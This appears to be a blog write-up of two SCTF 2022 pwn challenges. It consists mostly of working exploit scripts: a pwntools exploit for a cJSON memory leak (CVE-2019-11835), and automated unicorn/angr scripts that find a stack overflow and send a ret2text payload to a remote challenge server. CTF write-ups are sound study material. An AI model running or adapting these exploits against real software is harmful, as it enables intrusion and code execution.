MENU

SCTF Pwn Writeup

March 16, 2022 • Read: 352 • Pwn,CTF

dataleak

CVE-2019-11835:https://github.com/DaveGamble/cJSON/issues/338

# encoding: utf-8
from pwn import *

elf = None
libc = None
file_name = "./cJSON_PWN"


# context.timeout = 1


def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary


def get_libc(dic=""):
    if context.binary == None:
        context.binary = dic + file_name
    assert isinstance(context.binary, ELF)
    libc = None
    for lib in context.binary.libs:
        if '/libc.' in lib or '/libc-' in lib:
            libc = ELF(lib, checksec=False)
    return libc


def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], int(sys.argv[2]), sys.argv[4])
            return s.process([file_name])
        else:
            if ":" in sys.argv[1]:
                r = sys.argv[1].split(':')
                return remote(r[0], int(r[1]))
            return remote(sys.argv[1], int(sys.argv[2]))
    else:
        return process([file_name])


def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        if info == None:
            info = 'libc_base:\t'
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address


def get_flag(sh):
    try:
        sh.recvrepeat(0.1)
        sh.sendline('cat flag')
        return sh.recvrepeat(0.3)
    except EOFError:
        return ""


def get_gdb(sh, addr=None, gdbscript=None, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript)
    elif addr is not None:
        gdb.attach(sh, 'b *$rebase(' + hex(addr) + ")")
    else:
        gdb.attach(sh)
    if stop:
        pause()


def Attack(target=None, elf=None, libc=None):
    global sh
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            sh.close()
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag


def pwn(sh, elf, libc):
    context.log_level = "debug"
    sh.send("aaaaaaaaaaaa/*")
    sh.send("bbbb/*cccccccc")
    sh.send("a/*aaaaaaaaaaa")
    sh.send("bbbb/*cccccccc")
    sh.interactive()


if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(elf=get_file(), libc=get_libc())
    sh.close()
    if flag != "":
        log.success('The flag is ' + re.search(r'flag{.+}', flag).group())

CheckIn_ret2text

unicorn + angr

angr 跑个流程图出来,找到返回块,往前找两层然后跑每一个块来定位到溢出地址,然后记录访问路径。

分成四种情况,其中三种可用 unicorn 处理,其中一种用 angr + SimProcedure 来处理。

import string
import base64
from pwn import *
from pwnlib.util.iters import bruteforce
import networkx.classes.reportviews
from pwn import *
import angr
from unicorn.x86_const import *
import am_graph
from unicorn import *

context.log_level = "debug"

BASE = 0x400000
CODE = BASE + 0x0
CODE_SIZE = 0x100000
STACK = 0x7F00000000
STACK_SIZE = 0x100000
RSP = STACK + 0x8000
RBP = RSP
RSP = RBP - 0x1000 - 0x420

RETN_DEEP = 0

FOUND_OVERFLOW = False
OVERFLOW_OFFSET = 0
OVERFLOW_LEN = 0
PATH = []

TYPE = -1
CODE_LOW = 0
CODE_HIGH = 0
CODE_TARGET = 0
CODE_CON = -1
CODE_OUTPUT = ""
CODE_EXIT = 0

TYPE1_STR = ""
TYPE1_READLEN = 0
TYPE2_CNT = 0


def u2s(n):
    return n if n < (1 << 31) else n - (1 << 32)


def retn(uc, retn=0):
    rsp = uc.reg_read(UC_X86_REG_RSP)
    retn_addr = u64(uc.mem_read(rsp, 8))
    uc.reg_write(UC_X86_REG_RAX, retn)
    uc.reg_write(UC_X86_REG_RIP, retn_addr)


def hook_block(uc, address, size, user_data):
    global FOUND_OVERFLOW, CODE_LOW, CODE_HIGH, CODE_TARGET, TYPE, CODE_CON, TYPE2_CNT, TYPE1_STR, TYPE1_READLEN, CODE_OUTPUT, OVERFLOW_OFFSET, OVERFLOW_LEN
    #print(">>> Tracing basic block at 0x%x, block size = 0x%x" % (address, size))
    if address + 4 == elf.plt['printf']:
        # print('printf')
        rdi = uc.reg_read(UC_X86_REG_RDI)
        str = ""
        while True:
            ch = uc.mem_read(rdi, 1)
            if ch == b'\x00':
                break
            str += ch.decode()
            rdi += 1
        CODE_OUTPUT = str
        retn(uc)
        return
    if address == 0x401272:
        # print('input_line')
        rdi = uc.reg_read(UC_X86_REG_RDI)
        rsi = uc.reg_read(UC_X86_REG_RSI)
        TYPE1_READLEN = rsi
        if rdi + rsi > RBP and rdi < RBP:
            FOUND_OVERFLOW = True
            OVERFLOW_OFFSET = RBP - rdi
            OVERFLOW_LEN = rsi
            print('overflow')
        else:
            FOUND_OVERFLOW = False
        retn(uc)
        return
    if address == 0x4012CE:
        # print('cmp')
        TYPE = 1
        rdi = uc.reg_read(UC_X86_REG_RDI)
        rsi = uc.reg_read(UC_X86_REG_RSI)
        TYPE1_STR = ""
        while True:
            ch1 = uc.mem_read(rdi, 1)
            ch2 = uc.mem_read(rsi, 1)
            if ch2 == b'\x00':
                break
            TYPE1_STR += chr(ord(ch1) ^ ord(ch2))
            rdi += 1
            rsi += 1
        retn(uc, 1)
        return
    if address == 0x401216:
        # print('input_val')
        TYPE = 2
        TYPE2_CNT += 1
        retn(uc)
        return
    if address == 0x40137A:
        # print('init')
        retn(uc)
        return
    if address == CODE_EXIT:
        # print('exit')
        uc.emu_stop()
        return
    if CODE_LOW != 0 and not CODE_LOW <= address < CODE_HIGH:
        if TYPE == 1:
            if CODE_TARGET == address:
                CODE_CON = 0
            else:
                CODE_CON = 1
        else:
            if CODE_TARGET == address:
                CODE_CON = 0
            else:
                CODE_CON = 1
        uc.emu_stop()


def find_path(x, fa, node):
    global RETN_DEEP, CODE_EXIT
    assert len(node.out_branches) <= 1
    if len(node.out_branches) == 0:
        CODE_EXIT = node.addr
        RETN_DEEP = x
        return False
    for edge in supergraph.out_edges(node):
        to = edge[1]
        if find_path(x + 1, node, to):
            if fa.addr != node.addr:
                print(hex(fa.addr) + "->" + hex(node.addr))
            PATH.append(node)
            return True

    if x == RETN_DEEP - 2:
        try:
            uc.emu_start(node.addr, node.addr + node.size)
        except Exception as e:
            print(e)
        if FOUND_OVERFLOW:
            PATH.append(node)
            return True
    # print(hex(node.addr), supergraph.in_degree(node), supergraph.out_degree(node), len(node.out_branches))


def init(uc):
    uc.mem_map(CODE, CODE_SIZE, UC_PROT_ALL)
    uc.mem_map(STACK, STACK_SIZE, UC_PROT_ALL)
    uc.mem_write(CODE, CODE_DATA)
    uc.reg_write(UC_X86_REG_RSP, RSP)
    uc.reg_write(UC_X86_REG_RBP, RBP)
    uc.hook_add(UC_HOOK_BLOCK, hook_block)


def passpow():
    sh.recvuntil('sha256(xxxx + ')
    last = sh.recvuntil(')', drop=True)
    sh.recvuntil(' == ')
    target = sh.recvuntil(' ', drop=True)
    print(last, target)
    return bruteforce(lambda x: hashlib.sha256(x.encode() + last).hexdigest().encode() == target,
                      string.ascii_letters + string.digits, length=4, method='fixed')


filename = r"vul"

sh = remote('123.60.82.85', 1447)
x = passpow()
sh.recvuntil("give me xxxx:")
sh.sendline(x)
ba = sh.recvuntil('==end==')
f = base64.b64decode(ba)
with open(filename, "wb") as fp:
    fp.write(f)

with open(filename, "rb") as f:
    CODE_DATA = f.read()
uc = Uc(UC_ARCH_X86, UC_MODE_64)
init(uc)

elf = ELF(filename)
project = angr.Project(filename, load_options={'auto_load_libs': False})
assert isinstance(project.analyses, angr.analyses.analysis.AnalysesHub)
cfg = project.analyses.CFGFast(normalize=True, force_complete_scan=False)
assert isinstance(cfg, angr.analyses.CFGFast)
main_addr = elf.sym['main']
main_fun = cfg.functions.get(main_addr)
assert isinstance(main_fun, angr.knowledge_plugins.functions.Function)

supergraph = am_graph.to_supergraph(main_fun.graph)
assert isinstance(supergraph, networkx.classes.digraph.DiGraph)

IN_NODE = None
for node in supergraph.nodes():
    assert isinstance(node, am_graph.SuperCFGNode)
    if supergraph.in_degree(node) == 0:
        IN_NODE = node
        break

assert IN_NODE != None
find_path(0, IN_NODE, IN_NODE)

PATH.reverse()
print(PATH)

init_state = project.factory.entry_state()


class inputSim(angr.SimProcedure):
    def run(self):
        stdin = self.state.posix.get_fd(0)
        data, real_length, = stdin.read_data(4)
        return data


project.hook_symbol("_Z9input_valv", inputSim())

for i in range(len(PATH) - 1):
    fa = PATH[i]
    to = PATH[i + 1]
    print("Solve: " + hex(fa.addr) + '->' + hex(to.addr))
    try:
        CODE_LOW = fa.addr
        CODE_HIGH = fa.addr + fa.size
        CODE_TARGET = to.addr
        CODE_CON = -1
        TYPE2_CNT = 0
        uc.emu_start(CODE_LOW, CODE_HIGH)
        if CODE_CON == -1:
            if TYPE == 1:
                CODE_CON = 1
            else:
                CODE_CON = 1
        print(TYPE, CODE_CON)

        CODE_INPUT = ""
        if TYPE == 1:
            if CODE_CON == 0:
                CODE_INPUT = 'a' * TYPE1_READLEN
            else:
                CODE_INPUT = TYPE1_STR
        else:
            if CODE_CON == 0:
                CODE_INPUT = ' ' * TYPE2_CNT
            else:
                INPUT_CNT = 0
                init_state.regs.rip = fa.addr
                sm = project.factory.simulation_manager(init_state)
                sm.explore(find=to.addr)
                assert len(sm.found) > 0
                found_state = sm.found[0]
                k = found_state.posix.dumps(0)
                for i in range(0, len(k), 4):
                    CODE_INPUT += str(u32(k[i: i + 4])) + " "
        print(CODE_OUTPUT)
        print(CODE_INPUT)
        sh.recvuntil(CODE_OUTPUT.encode(encoding='latin-1'))
        sh.send(CODE_INPUT.encode(encoding='latin-1'))
    except Exception as e:
        print(e)

print('OVERFLOW_OFFSET:' + str(OVERFLOW_OFFSET))
print('OVERFLOW_LEN:' + str(OVERFLOW_LEN))

payload = b'a' * OVERFLOW_OFFSET + p64(elf.bss() + 0x500) + p64(CODE_EXIT + 0x1) + p64(elf.sym['_Z8backdoorv'])
payload = payload.ljust(OVERFLOW_LEN, b'x')
sh.send(payload)
pause()
sh.sendline(b"ls")
sh.sendline(b"cat flag")
sh.interactive()

后来看 官方 wp 发现自己做复杂了,这里贴一下官方的 exp,里面 save_unconstrained 的用法值得学习

from pwn import *
import angr
import claripy
import base64
def pass_proof(target, part):
    pass

r = remote("123.60.82.85", 1447)
r.recvline()
r.recvline()
r.recvline()
proof = r.recvline().decode("ASCII")
ppp = pass_proof(proof[proof.find("== ") + 3: -2], proof[len("sha256(xxxx + "): proof.find(") == ")])
r.sendlineafter(b"give me xxxx:", ppp.encode("ASCII"))
r.recvline()
bin_data = base64.b64decode(r.recvline().decode("ASCII"))
###########################################################################################################
open("a.out", "wb").write(bin_data)
ret_rop = bin_data.find(b'\xc3', 0x1000) + 0x400000
print("ret_rop:", hex(ret_rop))

p = angr.Project("./a.out")

def getBVV(state, sizeInBytes, type = 'str'):
    global pathConditions
    name = 's_' + str(state.globals['symbols_count'])
    bvs = claripy.BVS(name, sizeInBytes * 8)
    state.globals['symbols_count'] += 1
    state.globals[name] = (bvs, type)
    return bvs

def angr_load_str(state, addr):
    s, i = '', 0
    while True:
        ch = state.solver.eval(state.memory.load(addr + i, 1))
        if ch == 0: break
        s += chr(ch)
        i += 1
    return s

class ReplacementCheckEquals(angr.SimProcedure):
    def run(self, str1, str2):
        cmp1 = angr_load_str(self.state, str2).encode("ascii")
        cmp0 = self.state.memory.load(str1, len(cmp1))
        self.state.regs.rax = claripy.If(cmp1 == cmp0, claripy.BVV(0, 32), claripy.BVV(1, 32))

class ReplacementCheckInput(angr.SimProcedure):
    def run(self, buf, len):
        len = self.state.solver.eval(len)
        self.state.memory.store(buf, getBVV(self.state, len))

class ReplacementInputVal(angr.SimProcedure):
    def run(self):
        self.state.regs.rax = getBVV(self.state, 4, 'int') 

class ReplacementInit(angr.SimProcedure):
    def run(self):
        return 

p.hook_symbol("_Z5fksthPKcS0_", ReplacementCheckEquals())
p.hook_symbol("_Z10input_linePcm", ReplacementCheckInput())
p.hook_symbol("_Z9input_valv", ReplacementInputVal())
p.hook_symbol("_Z4initv", ReplacementInit())
enter = p.factory.entry_state()
enter.globals['symbols_count'] = 0
simgr = p.factory.simgr(enter, save_unconstrained=True)
d = simgr.explore()
backdoor = p.loader.find_symbol('_Z8backdoorv').rebased_addr
for state in d.unconstrained:
    bindata = b''
    rsp = state.regs.rsp
    next_stack = state.memory.load(rsp, 8, endness=p.arch.memory_endness)
    state.add_constraints(state.regs.rip == ret_rop)
    state.add_constraints(next_stack == backdoor)
    for i in range(state.globals['symbols_count']):
        s, s_type = state.globals['s_' + str(i)]
        if s_type == 'str':
            bb = state.solver.eval(s, cast_to=bytes)
            if bb.count(b'\x00') == len(bb):
                bb = b'A' * bb.count(b'\x00')
            bindata += bb
        elif s_type == 'int':
            bindata += str(state.solver.eval(s, cast_to=int)).encode('ASCII') + b' '
    print(bindata)
    r.send(bindata)
    r.interactive()
    break
Archives QR Code
QR Code for this page
Tipping QR Code